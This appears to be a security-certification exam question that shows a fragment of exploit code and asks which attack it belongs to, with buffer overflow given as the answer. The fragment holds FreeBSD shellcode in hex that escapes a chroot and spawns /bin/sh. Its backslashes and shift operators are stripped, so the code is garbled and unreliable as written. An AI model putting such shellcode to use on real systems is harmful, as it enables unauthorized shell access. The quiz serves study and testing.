ECCouncil Exam Questions

what kind of attack?

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),

(((x)&0xff0000)16), (((x)&0xff000000)24)

char infin_loop[]=

/* for testing purposes */

"xEBxFE";

char bsdcode[] =

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */

"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"

"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"

"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"

"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"

"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"

"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"

"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"

"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"

"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"

"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"

"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"

"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"

"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];

static char *magic_str=NULL;

int before_len=0;

char *target=NULL, *username="user", *password=NULL;

struct targets getit;

The following exploit code is extracted from what kind of attack?

A.
Remote password cracking attack

B.
SQL Injection

C.
Distributed Denial of Service

D.
Cross Site Scripting

E.
Buffer Overflow

Explanation:
This is a buffer overflow with it’s payload in hex format.